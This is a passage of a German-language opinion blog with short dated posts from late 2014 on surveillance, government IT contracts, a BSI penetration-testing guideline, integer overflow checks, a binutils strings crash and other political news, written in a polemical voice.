Was Aftenposten jetzt gemacht hat, ist dass sie mit einem Cryptophone herumgelaufen sind, und die Baseband-Firewall an hatten. Dabei wird das Baseband sozusagen in einem Debug-Modus betrieben und zeigt interne Dinge gegenüber dem Betriebssystem an, was das dann anzeigen kann. Nun ist das nicht völlig ungewöhnlich, wenn ein Mobiltelefon vom Netz Daten kriegt, ohne danach gefragt zu haben. Wenn eine SMS kommt, will man das ja, oder wenn man Web klickt und die Antwort kommt. Daher hat Aftenposten diese Aktivitäten rausgerechnet und nur die übrigen Aktivitäten geplottet. Auch davon sind einige normal, z.B. wenn man sich ein Update für das assisted GPS holt, und es gibt auch einige gutartige Ncahrichten, die das Netz einem schicken kann. So 10-15 davon pro Tag sind normal. Aber so eine geographische Häufung ist ungewöhnlich, daher sind die Aftenposten-Leute nochmal mit einer Counterintelligence-Bude und ordentlichem Messequipment losgezogen und haben da komische Dinge gemessen und die Details ihrer Regierung übergeben.

Fri Dec 12 2014

[l] Ich nenne hier häufiger Regierungen "Junta", und kriege dafür dann auch gelegentlich Gegenwind. Bei Bush kommt jetzt kein Gegenwind mehr, spätestens seit den CIA-Folter-Geschichten, und heute gibt es eine Meldung, bei der hoffentlich auch der Gegenwind bezüglich unserer Junta aufhören wird: CSC freut sich über neue Verträge (!) mit Bundesbehörden (!!). Ja, richtig gelesen! CSC, die die IT bei der NSA machen, die die IT beim Klimagipfel gemacht haben, den die NSA dann massiv unterwandert und zum Scheitern gebracht hat, die der CIA für ihre Folterflüge Flugzeuge geliehen haben, DIE FIRMA CSC kriegt jetzt von unseren Bundesbehörden NEUE Aufträge.
Der Klopper:
Das Innenministerium bestätigt einen Vertrag mit dem Bundeskriminalamt. Dabei soll der im April verkündete “No-Spy-Erlass” zur Anwendung kommen: CSC verspricht, keine Daten an die NSA zu geben.
Sorry, aber da kann mir keiner was von Naivität erklären. Das ist Vorsatz. Das ist keine Regierung, das ist eine Junta.
Netzpolitik.org hat ein paar Emails zugespielt gekriegt, in denen CSC ihren Mitarbeitern gegenüber mit den neuen Aufträgen prahlt. Hier ist die Liste:
CSC freut sich, “weitere Rahmenverträge” mit sechs bundesdeutschen Behörden abgeschlossen zu haben. Dazu zählen:
- Landeskriminalamt Bayern: Rahmenvertrag neues polizeiliches Vorgangsbearbeitungssystem (IGVPFE)
- Bundeskriminalamt: Rahmenvertrag IT-Dienstleistungen
- Bundesverwaltungsamt: Fachverfahren Elektronisches Personal-, Organisations- und Stellenmanagement der Bundesverwaltung (EPOS)
- Bundesagentur für Arbeit (BA): Rahmenvertrag Systementwicklung (SE)
- Bundesagentur für Arbeit (BA): Partner der MID GmbH im Rahmenvertrag Systementwicklung (SE)
- Bundeswehr und BWI/HERKULES: Zusammenfassung der gewonnen Rahmenverträge
Spätestens bei der Bundeswehr ist dann hoffentlich jedem klar, was das bedeutet. Dort sollen sie übrigens Software entwickeln.

Thu Dec 11 2014

[l] Hätte Google ihr Google News ganz zugemacht, wenn das mit dem Leistungsschutzrecht nicht in der Kapitulation der Verleger geendet hätte? Wie sich jetzt in Spanien rausstellt: Ja.
Update: Yahoo News macht auch zu. Ich wusste gar nicht, dass es Yahoo News gibt.

Tue Dec 9 2014

[l] Bizarrometerexplosion: Der Chef der ACLU sagt, Bush, Cheney und die CIA-Folterknechte sollen von Obama eine Begnadigung kriegen. Die Idee bei Begnadigungen ist, damit besonders krasse Fälle von Fehlurteilen oder Justiz-Fuckups zu korrigieren. Aber in der Praxis verteilen die Präsidenten am Ende ihrer Amtszeit ein Pardon an ihre Schergen, so hat z.B. George W Bush eine Strafminderung für Lewis "Scooter" Libby rausgehauen. Der hatte eine Falschaussage bezüglich der CIA gemacht. Und Bill Clinton hat seinen Bruder freigelassen, der wegen Kokainbesitzes einsaß. Clinton hat auch den CIA-Direktor John Deutch begnadigt.
Die ACLU ist die American Civil Liberties Union, die wichtigste Bürgerrechtsorganisation der USA. Das sind traditionell nicht Leute, die Folterknechte begnadigen wollen würden. Die Argumentation hier ist, dass eine Begnadigung für die Geschichtsbücher klären würde, dass Folter eine Straftat ist, auch wenn es keine Anklage gab. Dass Bush und co angeklagt und eingeknastet werden, hält der gute Mann offensichtlich für ausgeschlossen. Zu Recht, vermutlich.

Mon Dec 8 2014

[l] Habt ihr das auch gehört mit der Rape Culture? Überall ist die, diese Rape Culture! Man kann als Frau nicht mal mehr an Frat House Parties teilnehmen, ohne brutal gegangraped zu werden! So jedenfalls las sich das im Rolling Stone letzten Monat. Bis sie diesen Monat die Story komplett zurückziehen mussten.
Telepolis über die Geschichte. Dass es die nicht stutzig gemacht hat, dass das angebliche Opfer ihnen gesagt hat, sie sollen bitte keinen Kontakt mit den angeblichen Tätern aufnehmen, das irritiert mich ein bisschen. Man sollte denken, Journalisten und Strafverfolger hätten höhere Standards als Hörensagen.
Der Fall ist nicht nur wegen des Rape Culture-Mems interessant. Vergewaltigungen sind ein häufiges Totschlagargument bei Diskussionen über Feminismus und die Frauenquote, genau wie Programmier-Debatten gerne zu "welcher Editor ist besser"-Kriegen mutieren. Dann kommt üblicherweise einer und fordert, dass man Vergewaltigungen auch ohne Beweise verfolgt, weil Beweise für Vergewaltigungen so schwer zu beschaffen sind, wenn sich die Opfer nicht melden, oder wenn es nur eine versuchte Vergewaltigung war. Daraufhin erinnert jemand anderes an die Grundsätze des Rechtsstaates, und wenn es besonders gut läuft, dann meint jemand anderes, auf den Rechtsstaat solle man an der Stelle scheißen, denn es geht hier um vergewaltigte Frauen!1!! Daraufhin kommt dann gerne das Argument, dass man sich ja Vergewaltigungsvorwürfe auch ausdenken kann, und das Gegenargument, dass das nur in verschwindend wenigen Fällen passiert, und das mehr erscheint als es ist, weil die Medien wegen der Seltenheit der Fälle da dann drüber berichten. Diese Argument wägt bitte selber für euch ab. :-)
Hier haben wir jedenfalls einen Fall nicht nur von anscheinend völlig frei erfundenen Vergewaltigungsvorwürfen, wir haben auch ehemals reputable Medien, die das einfach so gebracht haben, ohne vorher die angeblichen Tätern auch nur angehört zu haben. Kurz: Das, was die Feministen gefordert haben in Fällen von Vergewaltigung. Ergebnis: Die Unterkunft dieser Studentenverbindung ist vandalisiert worden, und das Stigma werden die wahrscheinlich nie wieder ganz los.

Tue Dec 2 2014

[l] Nachdem die "Konservativen" um Cameron erfolgreich einen landesweiten Internet-Pornofilter installiert haben, und nicht mit Fackeln und Mistgabeln aus der Stadt gejagt wurden, spüren sie Rückenwind und regulieren jetzt auch in einer Nacht-und-Nebel-Aktion, welche Art von Porno in England produziert werden darf. Und man sieht der Liste an, dass sie von Männern gemacht wurde. Dinge, die Männern Spaß machen, sind noch erlaubt. BDSM, Fisting und Female ejaculation sind verboten.
"There appear to be no rational explanations for most of the R18 rules," Jerry Barnett of the anti-censorship group Sex and Censorship told Vice UK. "They're simply a set of moral judgements designed by people who have struggled endlessly to stop the British people from watching pornography."
More worryingly, the amendment seems to take issue with acts from which women traditionally derive pleasure.

Mon Dec 1 2014

[l] Hey, erinnert ihr euch noch daran, wie die Fifa sich selbst von Korruptionsvorwürfen freigesprochen hat? Und wie der Typ, der die Untersuchung geleitet hat, dann protestierte? So langsam kommen Details raus. So soll Russland Fifa-Wahlberechtigte mit Kunstschätzen in neutraler brauner Papierverpackung geschmiert haben. Der Fifa-Manager Michel Platini soll sogar einen Picasso gekriegt haben.
Ein belgischer Funktionär hat ein Landschaftsgemälde gekriegt und sich daraufhin so verteidigt:
D'Hooghe told the Sunday Times that he believed the painting given to him, was "absolutely ugly" and he believed it had no value. He said he had not voted for the Russian bid.
Ach so, na dann.
Ja und was haben die anderen Länder gemacht, um die WM zu kriegen?
It also claims England's bid used private security companies and a former member of the UK government's intelligence service MI6 to gather information on its rivals.
Qatar war besonders innovativ:
Under the heading, "Intelligence relating to Russia 2018" a series of allegations are revealed about Putin's role in brokering a major bilateral trade deal for gas with Qatar, the winners of the 2022 bid, in exchange for each others votes and the votes of others of their supporters.
Ihr seht schon, so einen klaren Fall von Korruptionslosigkeit hatten wir schon lange nicht mehr!
[l] Ausrede des Tages (OK, letzte Woche, aber hab ich damals verpasst): Bei der Obduktion von Mike Brown wurden keine Fotos gemacht. Begründung: Akku in der Kamera alle. Ja nee, klar. Dann geht das natürlich nicht.
Update: Das ist wohl falsch dargestellt in dem Tweet, nicht bei der Obduktion sondern am Tatort war der Akku alle und es wurden keine Fotos gemacht. Primärquelle (ab Seite 31).

Sun Nov 30 2014

[l] Ich habe vor ein paar Jahren ein bisschen mit Compilern und der Qualität von deren Codeerzeugung herumexperimentiert und daraus auch einen Vortrag gemacht. Die Folien sind online.
Mein ursprüngliches zentrales Anliegen in dem Vortrag war, den Programmierern die Illusion zu nehmen, dass sie schlauer als der Compiler sind. Später bin ich dann zu der Erkenntnis gelangt, dass das auch ein Sicherheitsproblem ist, wenn die Leute falsche Vorstellungen davon haben, welcher C-Code langsamen Maschinencode erzeugen wird und welcher nicht. Im Normalfall kosten z.B. Integer-Overflow-Checks gar nichts. Man muss sich anstrengen, um das überhaupt messen zu können. Das liegt daran, dass CPUs heutzutage superskalar sind, d.h. die funktionalen Einheiten ("Integer-Arithmetik" ist eine andere Einheit als "aus dem Speicher einen Wert laden") arbeiten unabhängig voneinander und asynchron. Und die CPUs sind heutzutage so viel schneller als der Arbeitsspeicher Werte liefern kann, dass die CPUs im Normalfall gerade auf irgendeinen Wert aus dem Hauptspeicher warten und die anderen Einheiten idle sind. Ob die jetzt einen Integer Overflow-Check machen, der im Normalfall eh nicht auslöst, das spielt keine Rolle.
Dennoch suchen Programmierer nach Ausreden, wieso irgendwas langsam sein könnte, daher habe ich in den Folien ab Seite 57 (nach Seitennummerierung der Folien) Overflow-Checks und den generierten Code angeschaut. Ich komme zu dem Ergebnis, dass Checks für Addition heute schon kostenlos sind, aber bei Multiplikation noch Optimierungspotential besteht. Ich meinte damals, dass die Compiler das fixen können, indem sie ihren Codegenerator verbessern, aber stattdessen haben die Compiler jetzt Intrinsics eingeführt. Zumindest clang und gcc ab Version 5.0. Hier ist das gcc 5 Neuerungen-Dokument, sucht darin mal nach __builtin_mul_overflow. Darin bewerben sie das Intrinsic genau damit, dass da nur noch ein mul mit einem jump on overflow rauskommt. Das ist genau was ich in meinen Folien als Ziel angesagt hatte damals.
Das möchte ich zum Anlass für die Ansage nehmen, dass es jetzt keinerlei Ausrede mehr gibt, nicht Integer Overflow-Checks zu machen. Das mul muss man eh machen, und jetzt kommt halt noch ein Jump dazu, der nie genommen wird, außer jemand exploitet den Code gerade. Der kostet nichts.
Macht mehr Overflow Checks!
Einen Vorteil hat die Intrinsic-Variante. Da können die Werte verschiedene Typen haben und der prüft auch gleich auf Truncation. Das spart schon Gefummel und Fehlerpotential gegenüber manueller Prüfung.

Fri Nov 28 2014

[l] Der Unterschied zwischen Apples Steuersparmodellen und dem Abhörmethoden ist ja bekanntlich, dass Apple sich an die Gesetze hält. Der BND nimmt sich einfach die Freiheit, die Realität und Gesetze "umzuinterpretieren". Die Süddeutsche fasst das mal zusammen. Die Langfassung gibt es wie immer bei Netzpolitik.org.
So haben sie zum Beispiel das Funktionsträgerprinzip erfunden. Wenn der BND z.B. die EU-Kommission bespitzeln will, dann würden sie einfach argumentieren, dass sie den EU-Kommissar Oettinger als juristische Person abschnorcheln, nicht als tatsächliche Person, denn die Person Oettinger ist von BND-Bespitzelungen gesetzlich ausgenommen.
Lustigerweise hatten ja dieses Jahr mehrere Experten ausgesagt, dass sich das genau anders herum verhält. Der Grundrechtsschutz gilt auch für Nicht-Deutsche, der BND darf überhaupt niemanden "strategisch" abhören.
Update: Das ist alles der Hammer, aber ich will mal eine Stelle rausgreifen:
- Der BND wollte von Telekommunikations-Betreibern wie dem DE-CIX (Internet-Knoten in Frankfurt am Main) Zugriff auf Glasfaser-Leitungen, um diese einerseits mit Selektoren und Filtern von Grundrechtsträgern nach Artikel 10 zu “bereinigen”, andererseits aber auch die übrigen “Routine-Verkehre” zu verwenden und an andere ausländische Nachrichtendienste weiter zu geben. Die Opposition bezeichnet das als “Trick”, der BND als “Nutzung gesetzlicher Befugnisse mit erwünschten Nebeneffekten”.
- Mindestens ein Telekommunikations-Betreiber widersprach dieser Rechtsauffassung des BND und sagte, das sei illegal, auch nach § 206 Strafgesetzbuch: Verletzung des Post- oder Fernmeldegeheimnisses. Daraufhin “überzeugte” das Bundeskanzleramt den Telekommunikations-Betreiber mit einem persönlichen Treffen und einem “Freibrief” von der Rechtauffassung des BND.
Ich lese mal zwischen den Zeilen, dass es sich bei dem widersprechenden Unternehmen um DE-CIX gehandelt hat, aber letztlich ist es ja auch egal, wer das jetzt konkret war. Das muss man sich mal vorstellen! Das Bundeskanzleramt hat dann einen auf Der Pate gemacht und die "überzeugt". AU WEIA.
Update: Und nur damit ihr das auch alle gesehen habt: Der BND darf maximal 20% der Bandbreite absaugen. Gemeint ist offensichtlich nicht die Bandbreite der Leitung sondern der übertragenen Daten. Denn Leitungen werden ja nicht auf Anschlag betrieben sondern man will ordentlich Luft haben, falls mal ein DDoS vorbeikommt oder so.
[l] Die Zentralbank der Niederlande hat 122,5 Tonnen Gold aus New York zurückgeholt.
Falls sich jemand fragt, was eigentlich aus dem Gold-Rückholprojekt der Bundesbank geworden ist, über das wir uns letztes Jahr beim Fnord-Jahresrückblick lustig gemacht hatten: Das bleibt in New York.
Womöglich hat die Bundesbank das entschieden, damit noch Gold da ist, das die Fed den Holländern "zurückgeben" kann? Wir Deutschen hatten ja schon immer eine "besondere Beziehung" zu den Amerikanern. Noch besonderer als die anderen.

Tue Nov 18 2014

[l] Das BSI hat einen Praxis-Leitfaden für Penetrationstests herausgegeben. Ich bin kein Freund von BSI-Bashing und blogge auch selten über Berufliches, aber dieser Leitfaden verdient Aufmerksamkeit. Zum Kontext: Das BSI ist bisher nicht durch eigene Penetrationstest-Kompetenz aufgefallen, hat keine weiterbringenden Advisories veröffentlicht, keine neuen Bugs gefunden, outsourced Dinge dafür gerne an Drittfirmen.
Die Kern-Forderung des Dokumentes ist, dass man nicht einfach bei irgendwelchen Krautern seine Penetrationstests in Auftrag geben soll, sondern bei zertifizierten Prüfstellen. Nun gibt es bisher keine zertifizierten Prüfstellen, weil völlig unklar ist, wer da überhaupt die Kompetenz haben soll, andere Marktteilnehmer zu zertifizieren. Es gibt natürlich Common Criteria und ISO9000, aber das ist hier mit Zertifizierung nicht gemeint.
Ich für meinen Teil sehe das Problem auch, dass es unseriöse Marktteilnehmer gibt, aber das wird man mit Zertifikaten nicht los. Im Gegenteil, die verkaufen selber üblicherweise Zertifikate. Ich würde sogar soweit gehen, dass man unseriöse Marktteilnehmer relativ zuverlässig daran erkennen kann, dass sie Zertifikate verkaufen.
Hier ist, was das BSI vorschlägt (Sektion 2.2.3).
Anbieter, die IS-Penetrationstests anbieten, sollten möglichst als Prüfstelle zertifiziert sein. Sie sollten nachweislich die Grundsätze des Datenschutzes, der sicheren Datenhaltung und der IT-Sicherheit einhalten und qualifiziertes Personal beschäftigen.
Das ist in der Praxis natürlich Blödsinn. Einhaltung des Datenschutzes weist man nicht nach, wie soll das auch vor dem Einsatz für die Zukunft gehen, sondern man macht einen Vertrag, wo das mit heftigen Strafen belegt wird. Und dann leakt da auch nichts. Bei der sicheren Datenhaltung kann man jetzt natürlich sagen, dass das wie eine gute Idee klingt. Aber in der Praxis steht im Vertrag drin: ihr dürft unseren Quellcode sehen, aber nicht kopieren. Es gibt da keine Daten, die man als Pentester halten würde. Außer natürlich dem Report, den man im Rahmen des Auftrags schreibt. Man archiviert da nicht jahrelang irgendwelche Daten von irgendwelchen Kunden, die bei irgendwelchen Tests vor 10 Jahren angefallen sind. Das tut man in den Vertrag und fertig.
Das mit dem qualifizierten Personal halte ich für am gefährlichsten an der ganzen Chose. Denn da gibt es schlicht keine Metriken. Es gibt natürlich irgendwelche Gruppierungen aus dem Zertifikate-Verkloppen-Umfeld, die auch Zertifikate für Personen verkloppen. Und bestürzenderweise zitiert das BSI auch genau diese Leute in ihren Referenzen am Ende, irgendwelche sinnlosen "ethical hacker"-Pömpel mit genau Null Aussagekraft. Selbst wenn jemand sein Leben lang ehrlich war, kann der ja trotzdem morgen kriminell werden und mit deinen Daten weglaufen. Die Aussagefähigkeit und Messbarkeit ist hier meines Erachtens nicht gegeben. Und insbesondere haftet keiner dieser Zertifikatsherausgeber dafür, wenn einer ihrer Zertifikatsträger sich dann anders als zertifiziert verhält. Zertifikate verkaufen ist ein Geschäftsmodell, kein Kundendienst.
Und so stellt sich auch für das BSI die Frage, was man denn jetzt machen soll, wenn keine Zertifikate vorliegen. Antwort:
Es wird dort verlangt, dass ein IS-Penetrationstester Berufserfahrung in dem Bereich IT-Penetrationstest besitzt und eine technische Ausbildung abgeschlossen hat. Der Projektverantwortliche muss in den letzten acht Jahren mindestens fünf Jahre Berufserfahrung (Vollzeit) im Bereich IT erworben haben, davon sollten mindestens zwei Jahre (Vollzeit) im Bereich Informationssicherheit absolviert worden sein. Zudem sollte der IS-Penetrationstester an mindestens sechs Penetrationstests in den letzten drei Jahren teilgenommen haben. Dies sollte möglichst vom Anbieter über entsprechende Referenzen nachgewiesen werden.
Aus meiner Sicht ist das wildes Hand Waving. Gestikulieren, damit keiner merkt, dass der Kaiser keine Kleider trägt.
In der Praxis kann man das mit den Referenzen vergessen. Viele Kunden wollen nicht als Referenz auftreten. Und selbst wenn Firma XY mit Mitarbeiter A und B einen Pentest bei Firma Z durchgeführt hat, weiß Z doch gar nicht, wer da tatsächlich die Arbeit gemacht hat. Das ist schlicht nicht bewertbar, ob A oder B fit ist. Oder beide. Oder vielleicht keiner von ihnen und sie hatten nur Glück oder ein gutes Tool dabei.
Der Report fällt dann noch durch Vorschläge wie den hier auf (Sektion 3.1.2):
Der Auftraggeber sollte gewährleisten, dass keine Änderungen an den Systemen während der Tests durchgeführt werden. Sollte der Ansprechpartner des Auftraggebers durch Beobachten des IS-Penetrationstests oder Gespräche auf Sicherheitslücken aufmerksam werden, so muss er warten, bis der IS-Penetrationstest abgeschlossen ist, bevor er die Lücke beseitigt, da sonst die Testergebnisse verfälscht werden können.
Bitte was? Der Kunde darf seine Systeme nicht sicherer machen, weil sonst der Test verfälscht werden könnte? Liebes BSI, Ziel eines Pentests ist, dass die Systeme sicherer werden, nicht dass der Test nicht verfälscht wird. Was ist DAS denn für ein Blödsinn?! Und im Übrigen, ich als Pentest-Durchführer bin der Auftragnehmer, ich kann da meinem Auftraggeber keine Vorschriften machen, wie ein Test ordentlich durchgeführt gehört.
Sollte eine derart gravierende Lücke entdeckt werden, dass es unabdingbar ist, diese sofort zu schließen, so sollte der IS-Penetrationstest abgebrochen und zu einem späteren Zeitpunkt weiter durchgeführt werden.
Es gibt keine fachliche Grundlage für diese Empfehlung.
Humoristisch besonders wertvoll ist auch diese Empfehlung (Sektion 4.1.2):
Das BSI empfiehlt, das IS-Penetrationstester nur solche Exploits einsetzen, deren Wirkungsweise sie schon untersucht und getestet haben.
Scheiße, Bernd!! Hätte mir das doch mal vorher jemand gesagt!1!!
Kurz gesagt: Das ist ein Schuss in den Ofen. Ich verstehe, dass das BSI hier gerne aktiv werden würde, denn Zertifikate kosten Geld, womöglich kann das BSI sich hier ähnlich wie das Patentamt zu einem Profit Center entwickeln. Aber den Kunden hilft das nichts. Aus meiner Sicht sind die Empfehlungen alle gesunder Menschenverstand, angereichert mit "kauft uns doch ein paar Zertifikate ab, Zertifikate können wir gut!"
[l] Kennt ihr das, bei öffentlichen Großprojekten? Der Bedarf wird konsequent unterschätzt, die Möglichkeiten und Fähigkeiten konsequent überschätzt? Normalerweise ist das nicht so schlimm, das wird dann halt alles Faktor 10 teurer und kann nur die Hälfte. Aber wie sich rausstellt, haben sie auch bei der Atommüllfrage den Bedarf mal eben mindestens 50% zu klein eingeschätzt.
Bislang wurde für Schacht Konrad eine Abfallmenge von 298 000 Kubikmetern Atommüll prognostiziert, meist aus dem Abriss der Atomkraftwerke. Stattdessen gehe der Bund nun "von einer Gesamtmenge der zu entsorgenden Abfälle mit vernachlässigbarer Wärmeentwicklung von rund 600 000 Kubikmetern" aus, heißt es in dem Entwurf.
Einer der Gründe ist, dass sie bisher bei der Urananreichung herumgammelnden Restefässer als "Wertstoff" und nicht als Atommüll deklariert hatten.
Wieso fällt das jetzt plötzlich auf? Weil der Plan diesmal nicht für das Beschubsen der eigenen Bevölkerung gemacht wird, sondern für die EU-Kommission. Und die will man offensichtlich nicht ganz so dreist belügen wie die eigene Bevölkerung.

Sun Nov 16 2014

[l] Hey, ist gerade fett Dürre hier in Kalifornien, da freuen die sich doch bestimmt über jeden Tropfen Wasser, oder? So oder so ähnlich müssen die Fracking-Leute sich das zurechtrationalisiert haben, als sie ihr Chemiebrühe-Abwasser ins Grundwasser gekippt haben.
Und, was soll ich euch sagen, die haben das nicht mal im Alleingang gemacht.
State officials allowed oil and gas companies to pump nearly three billion gallons of waste water into underground aquifers that could have been used for drinking water or irrigation.
In was für einer Welt leben wir eigentlich!

Fri Nov 14 2014

[l] The Intercept darüber, wie die Amis mit Duqu die ungarische CA aufgemacht haben.

Tue Nov 11 2014

[l] Kurze Durchsage von Republikaner-"Vordenker" Ted Cruz: "Net Neutrality" is Obamacare for the Internet
Vielleicht aus Deutschland gar nicht so direkt verständlich, denn Obamacare ist bei US-Republikanern ein Kampfbegriff, ein Schimpfwort, um Obamas Gesundheitsreform lächerlich und kaputt zu machen. Cruz versucht hier, mit dem einen aus seinen Augen verbrannten Begriff, Obamacare, auch den anderen, nämlich Netzneutralität, kaputtzumachen.
Update: The Oatmeal hat ein Erklärcomic zu dem Tweet gemacht. :-)

Tue Nov 4 2014

[l] Ich hoffe, ihr habt gestern alle die ARD-Spätnacht-Doku über Fukushima geguckt. Das war eines der erschütternsten Stück TV-Geschichte, an die ich mich überhaupt erinnern kann. Es ist auf der einen Seite ein vernichtendes Dokument der Verzweiflung. Bei uns hier, mit komfortablem Abstand, da hören Gedankengänge über Fukushima bei Punkten wie "naja, aber die Mauern strahlen ja alle, die Erde!" mit einem "…" auf, und dann denkt man da lieber nicht drüber nach. Oder: Am Ende der Strahlungszone liegt die Präfaktur-Hauptstadt Fukushima, und die war noch betroffen von Ausläufern. Da müsste man ja …
Diese Dokumentation geht hin und zeigt: Ja, müsste man. Und wird auch gemacht.
Das ist die andere Seite. Neben der Verzweiflung sieht man eben auch, wie die Japaner sich da nicht von einem Monster-Erdbeben, einem Riesen-Tsunami und einem geplatzten Atomkraftwerk ihr Land kaputt machen lassen wollen!
Da kann man dann sehen, wie tatsächlich Bagger 5cm Erde abtragen und in schwarze Säcke tun. Während das Team die filmt, kommt auf dem Lautsprechersystem "es ist jetzt 14:30, wie Sie wissen können Sie sich hier nur bis 15:00 aufhalten. Bitte begeben Sie sich zügig aber ohne übertriebene Unachtsamkeit zum Ausgang." Die ganze Atmosphäre in diesem Film ist so deprimierend aber gleichzeitig auch so ein Hoffnungsstrahl, dass die Leute das trotzdem machen.
Sie haben da eine Geisterstadt gefilmt, wo die Strahlung so hoch ist, dass man da nicht mehr wohnen können wird in absehbarer Zeit. Trotzdem hat sich da eine "freiwillige Feuerwehr" gegründet, um die Geisterstraßen zu patrouillieren und Brandstifter und Diebe abzuwehren. Irgendwas muss man doch machen, sagen die auf Nachfrage. Wir kommen schließlich von hier.
Mich hat dieser Film echt mitgenommen. Guckt euch den besser nicht an, wenn ihr gerade eine Winterdepression habt.
Und das eigentlich Highlight, das aber neben diesen Aufnahmen meiner Ansicht nach verblasst, ist dass sie ins AKW reingekommen sind und filmen durften. Das Abklingbecken z.B. — und da sind kaum noch Brennstäbe drin. Das Gebäude war baufällig, alles bröselte, große Strahlung, oben war Schutt drauf gefallen, aber davon ließen die sich nicht abhalten. Muss ja gemacht werden.

Sat Nov 1 2014

[l] Scotland Yard zahlt jetzt Alimente. Ihr erinnert euch bestimmt an den Fall. Undercover-Cops haben sich an Tierschützer und andere zu überwachende Aktivisten rangemacht, so dass dabei am Ende sogar Hochzeiten und Kinder rauskamen. Eines Tages ist der Vater dann weg und die Mutter erfährt überhaupt erst Jahre später, dass der Vater ein Spion war.

Sat Oct 25 2014

[l] Bug des Tages: strings auf ein Binary ausführen kann strings crashen. Nach mehr sieht mir das im Moment nicht aus, aber, mal man soll ja den Tag nicht vor dem Abend loben.
Ich erwähne das und mache es zum Bug des Tages, weil das so eine der ersten Sachen ist, die man in der Computer-Forensik macht. strings drauf laufen lassen. Und, wie sich rausstellt, verwendet GNU strings libbfd von binutils und parsed ELF-Binaries. Wenn da kaputte Header drin sind, dann crasht halt strings. Das ist für Forensik-Anwendungen natürlich absolut überhaupt gar nicht zu verteidigen. Schon weil man sich jetzt die Frage stellen muss, ob da noch mehr als ein Crash rauszuholen ist, aus dem ranzigen libbfd-Parsing-Code. Na? Wer will das mal auditieren? Ich hab mir ja diesen ELF-Kram mal ein bisschen angeguckt, für dietlibc, und habe nur drei Kreuze gemacht, als mein Code endlich tat. ELF ist ein sehr gruseliger Standard.
Update: Jetzt ist die Exploitbarkeit auf ein free() geupgraded worden, und man kann das auch via objdump und nm erreichen.

Fri Oct 24 2014

[l] Don Alphonso über "das Aufschrei-Netzwerk". Ich empfehle das nicht wegen des Nachrichtenwerts oder weil da neue Dinge berichtet werden. Aber alleine die Liste an menschenverachtenden Tweets, die er da verlinkt, die hat mich gerade ein bisschen sprachlos gemacht. Ich habe ja keinen Twitter-Account und halte mich im Allgemeinen auch aus Webforen und Imageboards raus, weil ich keinen Bock auf sich gegenseitig anbrüllende Proleten habe. Daher hatte ich auch keine Vorstellung, wie wörtlich der Begriff "Shitstorm" die Realität beschreibt. Was einem da an blankem Hass im Namen des Feminismus entgegen schwappt, das hat mich gerade ziemlich kalt erwischt.
Ich bin wie gesagt in der Debatte nicht so drin, weil ich mich da auch absichtlich raushalte. Das liegt vor allem daran, dass mir gleich schon die erste Seite, deren Argumente ich mir anhören wollte, Vorschriften machen wollte, welche und wessen Argumente ich anhören darf und welche nicht. Wenn das passiert, mache ich normalerweise einen großen Bogen um das ganze Thema und nehme keinen der Teilnehmer mehr ernst. Es gibt da so einen schönen Spruch, der George Bernard Shaw zugeschrieben wird.
I learned long ago, never to wrestle with a pig. You get dirty, and besides, the pig likes it.
Das gilt eben nicht nur für Wrestling mit Schweinen sondern auch für Internet-Diskurse in Webforen, und bei Twitter ist es offensichtlich noch mal eine Packung schlimmer. Es ist übrigens auch im Leben außerhalb des Internets eine bewährte Maxime.
Ich nehme ja hier im Blog auch selten ein Blatt vor den Mund, aber das heißt nicht, dass man andere Menschen so persönlich anpinkeln muss. Das ist ja eine Sache, das mit Politikern zu machen, die in meinem Namen Dinge tun, die ich nicht gutheiße. Das ist nochmal eine völlig andere Sache, einfach so im Internet irgendwelche wildfremden Leute mit Scheiße zu bewerfen. Also, in diesem Sinne. Wir sind keine steinzeitlichen Höhlenbewohner mehr. Benehmt euch mal bitte entsprechend.
Respekt an dieser Stelle übrigens für die Ausdauer von Don Alphonso. Die Energie hätte ich nicht gehabt, mich durch diese Fäkalienlavine durchzuarbeiten, um da das Best-Of verlinken zu können.
Übrigens, am Rande: Kennt ihr schon die Non-White-Heterosexual-Male License?

Fri Oct 17 2014

[l] TV-Tipp: Ein WDR-Team durfte beim "Verfassungsschutz" filmen. Daraus ist eine Sendung aus der Reihe "die story" geworden. Sie haben da ingesamt um die 40 Mitarbeiter interviewt, die operativen Mitarbeiter mit Perrücke, falschem Bart und Brille getarnt. Alleine dafür lohnt sich das schon, aber auch was sie da jetzt im Einzelnen zu Protokoll geben, das lohnt sich. Sogar der "Verfassungsschutz" aus Sachsen hat mitgemacht.

Thu Oct 16 2014

[l] Wisst ihr noch den Skandal, als es hieß, russische Soldaten kämpften auf Seiten der ostukrainischen Rebellen? Diplomatische Beschwerden, Sanktionen, was haben wir da nicht alles gemacht. Ein Skandal sondergleichen. Nun, ich hoffe, die EU macht jetzt auch Sanktionen gegen Deutschland.

Mon Oct 13 2014

[l] Getdigital wird gerade von Bavaria Film abgemahnt, sie sollen die Wikileaks-T-Shirts aus dem Programm nehmen. Wait, what?! Stellt sich raus: Bavaria Film hat eine Presseerklärung dazu. Sie sagen, sie handelten im Auftrag der "Vertreter der Markenrechte von WikiLeaks und der Persönlichkeitsrechte von Julia (sic!) Assange".
Bonus: Getdigital hat die Gewinne aus dem Verkauf über die Wau-Holland-Stiftung immer schön an Wikileaks gespendet.
Das war ja wohl mal ein fetter Griff ins Klo. Au weia war das ein tiefer Griff ins Klo.
Schon die Überschrift ist ein Money Quote bei dem Bavaria-Text:
Fashion als Statement, das Produkt als Möglichkeit des persönlichen Ausdrucks: Bavaria Sonor vertritt WikiLeaks und Julian Assange als Lizenzagentur
Update: Hintergrund ist vermutlich das hier:
Julian Assange will release a Wikileaks clothing line
Ja super! So sammelt man Sympathiepunkte!
Update: Falls jemand von euch zu faul zum runterscrollen und weiterlesen war:
Zu letzteren zählen unter anderem Julian Assange, Edgar Snowden und Glenn Greenwald.
Ja, dieser Edgar, das ist ein ganz schlimmer Finger!1!!

Sun Oct 12 2014

[l] Die "Bild"-"Zeitung" erklärt uns diese Woche, wer eigentlich ISIS finanziert. Und zwar: Die Gema (Vorsicht: Link geht zur "Bild"). Natürlich Spinger-typisch dünn bei den Fakten und dick bei den Fonts der Überschriften, aber wenn Axel Springer und die Gema sich gegenseitig ankacken, da kann es nur Gewinner geben.

Fri Oct 10 2014

